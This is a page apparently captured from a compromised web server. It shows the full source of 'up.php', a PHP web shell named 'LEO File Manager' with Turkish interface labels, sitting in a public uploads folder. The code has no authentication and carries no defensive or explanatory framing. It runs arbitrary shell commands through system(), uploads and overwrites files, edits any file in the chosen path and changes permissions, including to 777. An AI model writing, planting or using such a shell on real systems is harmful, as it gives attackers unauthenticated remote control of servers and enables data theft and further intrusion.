HEX
Server: Apache
System: Linux vps-4103104.goatdigital.com.br 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: wwgoat (1001)
PHP: 8.0.30
Disabled: NONE
$ pwd: /home/wwgoat/public_html/uploads/
Upload Files
File: /home/wwgoat/public_html/uploads/up.php
<?php

@ini_set('display_errors', 0);

@set_time_limit(0);

error_reporting(0);

$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();

$cwd = realpath($cwd);

if (isset($_POST['upload']) && isset($_FILES['file'])) {

    $target = $cwd . '/' . basename($_FILES['file']['name']);

    @move_uploaded_file($_FILES['file']['tmp_name'], $target);

}

if (isset($_POST['save']) && isset($_POST['filename'])) {

    $path = $cwd.'/'.basename($_POST['filename']);

    @file_put_contents($path, $_POST['content']);

}

if (isset($_POST['mkdir']) && !empty($_POST['dirname'])) {

    $newdir = $cwd . '/' . basename($_POST['dirname']);

    if (!is_dir($newdir)) {

        @mkdir($newdir, 0755, true);

    }

}

if (isset($_POST['chmod_file']) && !empty($_POST['chmod_target']) && !empty($_POST['chmod_perms'])) {

    $target = $cwd . '/' . basename($_POST['chmod_target']);

    $perms = octdec($_POST['chmod_perms']);

    if (file_exists($target)) {

        @chmod($target, $perms);

        echo "<div style='background:#d4edda;color:#155724;padding:8px 12px;border-radius:4px;margin-bottom:8px;font-size:14px;'>✔ İzin değiştirildi: <b>" . htmlspecialchars(basename($target)) . "</b> → <b>" . htmlspecialchars($_POST['chmod_perms']) . "</b></div>";

    }

}

if (isset($_POST['cmd']) && !empty($_POST['cmd'])) {

    echo "<pre style='background:#1e1e1e;color:#00ff00;padding:10px;border-radius:4px;overflow:auto;'>";

    system($_POST['cmd'] . " 2>&1");

    echo "</pre>";

}

function format_perms($file) {
    if (!file_exists($file)) return '---------';
    $perms = fileperms($file);
    $info = '';
    $info .= ($perms & 0x4000) ? 'd' : ($perms & 0x8000) ? '-' : '?';
    $info .= ($perms & 0x0100) ? 'r' : '-';
    $info .= ($perms & 0x0080) ? 'w' : '-';
    $info .= ($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-');
    $info .= ($perms & 0x0020) ? 'r' : '-';
    $info .= ($perms & 0x0010) ? 'w' : '-';
    $info .= ($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-');
    $info .= ($perms & 0x0004) ? 'r' : '-';
    $info .= ($perms & 0x0002) ? 'w' : '-';
    $info .= ($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-');
    return $info;
}

function format_size($bytes) {
    if ($bytes >= 1073741824) return round($bytes / 1073741824, 1) . ' GB';
    if ($bytes >= 1048576) return round($bytes / 1048576, 1) . ' MB';
    if ($bytes >= 1024) return round($bytes / 1024, 1) . ' KB';
    return $bytes . ' B';
}

echo "<!DOCTYPE html><html><head><style>
* { margin:0; padding:0; box-sizing:border-box; }
body { font-family:'Segoe UI',Tahoma,sans-serif; background:#0d1117; color:#c9d1d9; padding:20px; }
h2 { color:#58a6ff; font-size:24px; margin-bottom:5px; }
.path-bar { background:#161b22; padding:10px 14px; border-radius:6px; margin:10px 0; font-size:13px; border:1px solid #30363d; }
.path-bar b { color:#58a6ff; }
.toolbar { display:flex; gap:8px; flex-wrap:wrap; margin:12px 0; align-items:center; }
.toolbar form { display:inline-flex; align-items:center; gap:5px; background:#161b22; padding:8px 12px; border-radius:6px; border:1px solid #30363d; }
.toolbar input, .toolbar select { background:#0d1117; border:1px solid #30363d; color:#c9d1d9; padding:6px 10px; border-radius:4px; font-size:13px; }
.toolbar input:focus, .toolbar select:focus { outline:none; border-color:#58a6ff; }
.toolbar input[type='submit'] { background:#238636; color:#fff; border:none; cursor:pointer; font-weight:600; padding:6px 14px; }
.toolbar input[type='submit']:hover { background:#2ea043; }
.file-table { width:100%; border-collapse:collapse; margin-top:8px; }
.file-table th { text-align:left; padding:8px 12px; background:#161b22; border-bottom:2px solid #30363d; font-size:12px; text-transform:uppercase; color:#8b949e; letter-spacing:0.5px; }
.file-table td { padding:6px 12px; border-bottom:1px solid #21262d; font-size:13px; }
.file-table tr:hover { background:#161b22; }
.file-table a { color:#58a6ff; text-decoration:none; }
.file-table a:hover { text-decoration:underline; }
.perms-box { font-family:'Courier New',monospace; font-size:12px; background:#0d1117; padding:3px 8px; border-radius:3px; border:1px solid #30363d; display:inline-block; }
.chmod-form { display:inline-flex; align-items:center; gap:3px; }
.chmod-form select { background:#0d1117; border:1px solid #30363d; color:#c9d1d9; padding:2px 4px; border-radius:3px; font-size:11px; width:60px; }
.chmod-form input[type='submit'] { background:#1f6feb; color:#fff; border:none; padding:2px 8px; border-radius:3px; cursor:pointer; font-size:11px; }
.chmod-form input[type='submit']:hover { background:#388bfd; }
.owner { color:#8b949e; font-size:12px; }
.size { color:#8b949e; font-size:12px; text-align:right; }
.upload-area { background:#161b22; padding:12px; border-radius:6px; border:1px solid #30363d; margin-top:12px; }
.upload-area form { display:flex; gap:8px; align-items:center; }
.upload-area input[type='file'] { background:#0d1117; border:1px solid #30363d; color:#c9d1d9; padding:6px; border-radius:4px; font-size:13px; flex:1; }
.upload-area input[type='submit'] { background:#238636; color:#fff; border:none; padding:6px 18px; border-radius:4px; cursor:pointer; font-weight:600; }
.upload-area input[type='submit']:hover { background:#2ea043; }
</style></head><body>";

echo "<h2>🔧 LEO File Manager</h2>";

echo "<div class='path-bar'><b>📂 Path:</b> " . htmlspecialchars($cwd) . "</div>";

echo "<div class='toolbar'>";

echo "<form method='post'>";

echo "<input name='cmd' placeholder='komut' style='width:200px'>";

echo "<input type='submit' value='▶ Çalıştır'>";

echo "</form>";

echo "<form method='post'>";

echo "<input name='dirname' placeholder='klasor_adi'>";

echo "<input type='submit' name='mkdir' value='+ Klasör'>";

echo "</form>";

echo "</div>";

$files = @scandir($cwd);

echo "<table class='file-table'>";

echo "<tr><th style='width:45%'>Dosya Adı</th><th style='width:20%'>İzinler</th><th style='width:15%'>Boyut</th><th style='width:20%'>İşlem</th></tr>";

foreach ($files as $f) {

    if ($f == ".") continue;

    $fp = $cwd.'/'.$f;

    $perms_str = format_perms($fp);

    $size = is_file($fp) ? format_size(filesize($fp)) : '-';

    if (is_dir($fp)) {

        echo "<tr>";

        echo "<td>📁 <a href='?path=" . urlencode($fp) . "'>" . htmlspecialchars($f) . "</a></td>";

        echo "<td><span class='perms-box'>" . $perms_str . "</span></td>";

        echo "<td class='size'>" . $size . "</td>";

        echo "<td>";

        echo "<form class='chmod-form' method='post'>";

        echo "<input type='hidden' name='chmod_target' value='" . htmlspecialchars($f) . "'>";

        echo "<select name='chmod_perms'><option value='644'>644</option><option value='755' selected>755</option><option value='777'>777</option><option value='700'>700</option></select>";

        echo "<input type='submit' name='chmod_file' value='Chmod'>";

        echo "</form>";

        echo "</td>";

        echo "</tr>";

    } else {

        echo "<tr>";

        echo "<td>📄 <a href='?path=" . urlencode($cwd) . "&edit=" . urlencode($f) . "'>" . htmlspecialchars($f) . "</a></td>";

        echo "<td><span class='perms-box'>" . $perms_str . "</span></td>";

        echo "<td class='size'>" . $size . "</td>";

        echo "<td>";

        echo "<form class='chmod-form' method='post'>";

        echo "<input type='hidden' name='chmod_target' value='" . htmlspecialchars($f) . "'>";

        echo "<select name='chmod_perms'><option value='644' selected>644</option><option value='755'>755</option><option value='777'>777</option><option value='600'>600</option></select>";

        echo "<input type='submit' name='chmod_file' value='Chmod'>";

        echo "</form>";

        echo "</td>";

        echo "</tr>";

    }

}

echo "</table>";

if (isset($_GET['edit'])) {

    $file = basename($_GET['edit']);

    $full = $cwd.'/'.$file;

    if (file_exists($full)) {

        $content = @file_get_contents($full);

        echo "<div style='background:#161b22;border:1px solid #30363d;border-radius:6px;padding:14px;margin-top:14px;'>";

        echo "<h3 style='color:#58a6ff;font-size:16px;margin-bottom:8px;'>✏️ Düzenle: " . htmlspecialchars($file) . "</h3>";

        echo "<form method='post'>";

        echo "<input type='hidden' name='filename' value='" . htmlspecialchars($file) . "'>";

        echo "<textarea name='content' rows='15' style='width:100%;background:#0d1117;border:1px solid #30363d;color:#c9d1d9;padding:10px;border-radius:4px;font-family:Courier New,monospace;font-size:13px;'>" . htmlspecialchars($content) . "</textarea><br>";

        echo "<div style='margin-top:8px;'><input type='submit' name='save' value='💾 Kaydet' style='background:#238636;color:#fff;border:none;padding:8px 20px;border-radius:4px;cursor:pointer;font-weight:600;'></div>";

        echo "</form>";

        echo "</div>";

    }

}

echo "<div class='upload-area'>";

echo "<form method='post' enctype='multipart/form-data'>";

echo "<input type='file' name='file'>";

echo "<input type='submit' name='upload' value='📤 Yükle'>";

echo "</form>";

echo "</div>";

echo "</body></html>";

?>
@ Telegram